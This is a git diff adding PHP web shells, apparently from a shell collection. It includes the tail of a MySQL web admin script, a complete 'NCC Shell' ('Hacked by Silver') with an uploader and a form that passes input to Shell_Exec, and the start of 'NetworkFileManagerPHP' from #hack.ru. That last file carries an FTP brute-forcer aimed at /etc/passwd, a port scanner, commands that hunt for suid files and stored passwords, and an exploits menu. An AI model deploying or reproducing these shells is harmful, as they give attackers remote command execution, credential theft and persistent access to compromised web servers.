+  if( $command == "flush_privileges" ) {
+  if( mysql_query( "Flush privileges" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
+  if( $command == "flush_tables" ) {
+  if( mysql_query( "Flush tables" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
+  if( $command == "flush_status" ) {
+  if( mysql_query( "Flush status" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "</ul>\n";
+} else {
+  $queryStr = ereg_replace( "_", " ", $command );
+  $pResult = mysql_query( $queryStr );
+  if( $pResult == false ) {
+  echo "Fail";
+  return;
+  }
+  $col = mysql_num_fields( $pResult );
+
+  echo "<p class=location>$queryStr</p>\n";
+  echo "<hr>\n";
+
+  echo "<table cellspacing=1 cellpadding=2 border=0>\n";
+  echo "<tr>\n";
+  for( $i = 0; $i < $col; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  echo "<th>".$field->name."</th>\n";
+  }
+  echo "</tr>\n";
+
+  while( 1 ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  echo "<tr>\n";
+  for( $j = 0; $j < $col; $j++ )
+    echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
+  echo "</tr>\n";
+  }
+  echo "</table>\n";
+}
+}
+
+function header_html() {
+global $PHP_SELF;
+
+?>
+<html>
+<head>
+<title>MySQL Web Interface</title>
+<style type="text/css">
+<!--
+p.location {
+color: #FF6000;
+font-size: small;
+}
+h1 {
+color: #0090FF;
+}
+th {
+background-color: #34A725;
+color: #FFFFFF;
+font-size: x-small;
+}
+td {
+background-color: #5DB1FF;
+font-size: x-small;
+}
+form {
+margin-top: 0;
+margin-bottom: 0;
+}
+a {
+text-decoration:none;
+color: #848200;
+font-size:x-small;
+}
+a:link {
+}
+a:hover {
+background-color:#EEEFD5;
+color:#FF0000;
+text-decoration:none             
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+echo "<hr>\n";
+echo "<font size=2>\n";
+echo "<font color=blue>[$USERNAME]</font> - \n";
+
+echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+if( $tablename != "" )
+  echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
+echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+echo "</font>\n";
+echo "</body>\n";
+echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+logon();
+else if( $action == "logon_submit" )
+logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+  if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+  if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+}
+$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+dump();
+} else {
+while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+  if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+  if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+}
+echo "<!--";
+$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+echo "-->";
+
+if( $mysqlHandle == false ) {
+  echo "<html>\n";
+  echo "<head>\n";
+  echo "<title>MySQL Web Interface</title>\n";
+  echo "</head>\n";
+  echo "<body>\n";
+  echo "<table width=100% height=100%><tr><td><center>\n";
+  echo "<h1>Wrong Password!</h1>\n";
+  echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+  echo "</center></td></tr></table>\n";
+  echo "</body>\n";
+  echo "</html>\n";
+} else {
+  header_html();
+  if( $action == "listDBs" )
+  listDatabases();
+  else if( $action == "createDB" )
+  createDatabase();
+  else if( $action == "dropDB" )
+  dropDatabase();
+  else if( $action == "listTables" )
+  listTables();
+  else if( $action == "createTable" )
+  createTable();
+  else if( $action == "dropTable" )
+  dropTable();
+  else if( $action == "viewSchema" )
+  viewSchema();
+  else if( $action == "query" )
+  viewData( $queryStr );
+  else if( $action == "addField" )
+  manageField( "add" );
+  else if( $action == "addField_submit" )
+  manageField_submit( "add" );
+  else if( $action == "editField" )
+  manageField( "edit" );
+  else if( $action == "editField_submit" )
+  manageField_submit( "edit" );
+  else if( $action == "dropField" )
+  dropField();
+  else if( $action == "viewData" )
+  viewData( "" );
+  else if( $action == "addData" )
+  manageData( "add" );
+  else if( $action == "addData_submit" )
+  manageData_submit( "add" );
+  else if( $action == "editData" )
+  manageData( "edit" );
+  else if( $action == "editData_submit" )
+  manageData_submit( "edit" );
+  else if( $action == "deleteData" )
+  deleteData();
+  else if( $action == "utils" )
+  utils();
+
+  mysql_close( $mysqlHandle);
+  footer_html();
+}
+}
+
+?>
diff --git a/php/NCC-Shell.php b/php/NCC-Shell.php
new file mode 100644
index 0000000..e9bed11
--- /dev/null
+++ b/php/NCC-Shell.php
@@ -0,0 +1,60 @@
+<center>
+<h1>.:NCC:. Shell v1.0.0</h1>
+<title>.:NCC:. Shell v1.0.0</title>
+<head><h2>Hacked by Silver</h2></head>
+<h1>---------------------------------------------------------------------------------------</h1><br>
+<b><font color=red>---Server Info---</font></b><br>
+<?php
+echo "<b><font color=red>Safe Mode on/off:  </font></b>";
+// Check for safe mode
+if( ini_get('safe_mode') ) {
+  print '<font color=#FF0000><b>Safe Mode ON</b></font>';
+} else {
+  print '<font color=#008000><b>Safe Mode OFF</b></font>';
+}
+echo "</br>";
+echo "<b><font color=red>Momentane Directory:  </font></b>"; echo $_SERVER['DOCUMENT_ROOT'];
+echo "</br>";
+echo "<b><font color=red>Server: </font></b><br>"; echo $_SERVER['SERVER_SIGNATURE'];
+echo "<a href='$php_self?p=info'>PHPinfo</a>";
+if(@$_GET['p']=="info"){
+@phpinfo();
+exit;}
+?>
+<h1>---------------------------------------------------------------------------</h1><br>
+<h2>- Upload -</h2>
+<title>Upload - Shell/Datei</title>
+<form
+ action="<?php echo $_SERVER['PHP_SELF']; ?>"
+ method="post"
+ enctype="multipart/form-data">
+<input type="file" name="Upload" />
+<input type="submit" value="Upload!" />
+</form>
+<hr />
+<?php
+
+ if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {
+   // Alternativ:            and   $_FILES['probe']['size']
+   move_uploaded_file($_FILES['probe']['tmp_name'], "./dingen.php");
+   printf("Die Datei %s wurde als dingen.php hochgeladen.<br />\n",
+     $_FILES['probe']['name']);
+   printf("Sie ist %u Bytes groß und vom Typ %s.<br />\n",
+     $_FILES['probe']['size'], $_FILES['probe']['type']);
+ }
+?>
+<h1>---------------------------------------------------------------------------</h1><br>
+<h2>IpLogger</h2>
+<?php
+echo "<b><font color=red><br>IP: </font></b>"; echo $_SERVER['REMOTE_ADDR'];
+echo "<b><font color=red><br>PORT: </font></b>"; echo $_SERVER['REMOTE_PORT'];
+echo "<b><font color=red><br>BROWSER: </font></b>"; echo $_SERVER[HTTP_REFERER];
+echo "<b><font color=red><br>REFERER: </font></b>"; echo $_SERVER['HTTP_USER_AGENT'];
+?>
+<h1>---------------------------------------------------------------------------</h1><br>
+<h2>Directory Lister</h2>
+<? $cmd = $_REQUEST["-cmd"];?><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value=<?=$cmd?>><hr><pre><?if($cmd != "") print Shell_Exec($cmd);?></pre></form><br>
+<h1>---------------------------------------------------------------------------</h1><br>
+<b>--Coded by Silver©--<br>
+~|_Team .:National Cracker Crew:._|~<br>
+<a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b></html>
diff --git a/php/NFM 1.8.php b/php/NFM 1.8.php
new file mode 100644
index 0000000..f43e59c
--- /dev/null
+++ b/php/NFM 1.8.php	
@@ -0,0 +1,3086 @@
+<?
+error_reporting(5);
+/*
+$use_md5=0; // êğèïòîâàòü ïàğîëü ïî md5 èëè íåò? // 
+$uname="nfm";
+$upass="q1w2e3"; 
+
+
+if (isset($PHP_AUTH_USER) && ($PHP_AUTH_USER==$uname)) {
+ if ($use_md5) {
+  if (md5($PHP_AUTH_PW) != $upass) { Header('WWW-Authenticate: Basic realm="'.$title.'"');Header('HTTP/1.0 401 Unauthorized');exit; }
+ } else {
+  if ($PHP_AUTH_PW != $upass) { Header('WWW-Authenticate: Basic realm="'.$title.'"');Header('HTTP/1.0 401 Unauthorized');exit; }
+ }
+} else {
+ Header('WWW-Authenticate: Basic realm="'.$title.'"');
+ Header('HTTP/1.0 401 Unauthorized');
+ exit;
+} */
+if ($action != "download" && $action != "view" ):
+?>
+
+<?
+
+/* Âàøå ìûëî äëÿ îòïğàâêè ôàéëîâ, óêàæèòå ñâîå*/
+$demail ="âàøå ìûëî";
+
+/* ïîø¸ë êîíôèã */
+$title="NetworkFileManagerPHP";
+$ver="1.8.private (beta)";
+$sob="Cîáñòâåííîñòü <b><u>channel #hack.ru</u></b>";
+$id="0000001";
+
+/* FTP-áğóò */
+$filename="/etc/passwd";
+$ftp_server="localhost";
+/* ñêàíåğ ïîğòîâ */
+$min="1";
+$max="65535";
+
+/* Àëèàñû */
+$aliases=array(
+/* ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñ suid áèòîì */
+'find / -type f -perm -04000 -ls' => 'find all suid files'  ,
+/* ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñ sgid áèòîì */
+'find / -type f -perm -02000 -ls' => 'find all sgid files',
+/* ïîèñê íà ñåğâåğå ôàéëîâ config.inc.php */
+'find / -type f -name config.inc.php' => 'find config.inc.php files',
+/* ïîèñê íà ñåğâåğå âñåõ äèğåêòîğèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find / -perm -2 -ls' => 'find writable directories and files',
+'ls -la' => '---------------------------------------------------------',
+'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'  
+);
+
+/* Ïîğòû ñ íàèìåíîâàíèÿìè */
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+
+/* îïöèè êîí÷èëèñü, ïîø¸ë äèçàéí */
+$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
+$style=<<<style
+<style>
+a.menu   {
+color: #ffffcc;
+text-decoration:none;
+font-family: Times New Roman;
+font-weight: bold;
+     }
+a.menu:hover   {
+color: #FF0000;
+font-family: Times New Roman;
+text-decoration: none
+font-weight: bold;
+          }
+a   {
+color: #000000;
+text-decoration:none;
+font-family: Tahoma;
+font-size: 11px;
+     }
+a:hover   {
+color: #184984;
+font-family: Tahoma;
+text-decoration: underline
+font-size: 11px;
+          }
+td.up{
+color: #996600;
+font-family: Verdana;
+font-weight: normal;
+font-size: 11px;
+}
+.pagetitle {
+font-family: Arial, Helvetica, sans-serif; 
+color: #FFFFFF; 
+text-decoration: none; 
+font-size: 12px
+}
+.alert   {
+color: #FF0000;
+font-family: Tahoma;
+font-size: 11px;
+          }
+.button1 {
+font-size:11px;
+font-weight:bold;
+font-family:Verdana;
+background:#184984;
+border:1px solid #000000; cursor:hand; color:#ffffcc;
+}
+.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
+.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
+.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
+b {  font-weight: bold}
+table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
+</style>
+style;
+
+/* ñòèëè òàáëèö */
+$style1=<<<table
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+table;
+$style2=<<<table_file
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+table_file;
+$style3=<<<table_dir
+STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
+table_dir;
+$style4=<<<table_files
+STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
+table_files;
+$style_button=<<<button
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+button;
+$style_open=<<<open
+STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
+open;
+$style_close=<<<close
+STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
+close;
+$ins=<<<ins
+<script>
+function ins(text){
+document.hackru.chars_de.value+=text;
+document.hackru.chars_de.focus();
+}
+</script>
+ins;
+
+/* Ôîğìà îòïğàâêè*/
+$form = "
+<br>     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+   <tr>
+  <td align=center class=pagetitle colspan=2><b>Âîïğîñû ïî ñêğèïòó NetworkFileManagerPHP</b></font></b></td>
+  </tr>  <form method='POST' action='$PHP_SELF?action=feedback&status=ok'>
+     <tr>
+  <td colspan=2 align=center class=pagetitle><b>Îáğàòíàÿ ñâÿçü:</b></td>
+  </tr>
+    <tr>
+      <td width='250' class=pagetitle><b>Âàøå èìÿ:</b></td>
+      <td width='250' class=pagetitle>
+        <input type='text' name='name' size='40' class='inputbox'></td>
+      </tr>
+    <tr>
+      <td width='250' class=pagetitle><b>Email:</b></td>
+      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
+    </tr>
+  
+  <tr>
+  <td colspan=2 align=center class=pagetitle><b>
+  Âàøè âîïğîñû è ïîæåëàíèÿ:
+  </b></font></b></td>
+  </tr>
+  <tr>
+      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
+  <tr>
+  <td align=right><input type='submit' value='Äàâè' name='B1' class=button1 $style_button></td>
+      <td align=left><input type='reset' value='Î÷èñòèòü' name='B2' class=button1 $style_button></td>
+      </tr>
+</form></table><br>
+";
+
+	
+
+/* Ôîğìà HTML */
+$HTML=<<<html
+<html>
+<head>
+<title>$title $ver</title>
+$meta
+$style
+$ins
+</head>
+
+<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (© #hack.ru)</b> Âåğñèÿ: <b>$ver</b> </td></tr>
+<tr><td align=center colspan=6 class=pagetitle bgcolor=#76A8AB>Ñêğèïò äëÿ àäìèíèñòğèğîâàíèÿ ñâîåãî ñàéòà è íå òîëüêî...</td></tr>
+<tr>
+<td class=pagetitle align=center width='85%'><font color=#76A8AB><b>Ïîìîùü ïî ñêğèïòó:</b></font></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Âîïğîñû</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:Îïèñàíèå</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Îáíîâëåíèÿ</a>&nbsp;&nbsp;</td>
+</tr>
+
+<tr>
+<td class=pagetitle align=center width='85%' ><font color=#FFFF99><b>Ñåòåâîé ñîôò:</b></font></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Ñêàí ïîğòîâ</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:Áğóòåğ ÔÒÏ</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Àğõèâàöèÿ ïàïîê</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Äàìï Mysql</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=del'>.:Óäàëèòü NFM</a>&nbsp;&nbsp;</td>
+</tr>
+<tr>
+<td class=pagetitle align=center width='85%' ><font color=#9BD09B><b>Äîñòóï ê ıêñïëîéòàì:</b></font></td>
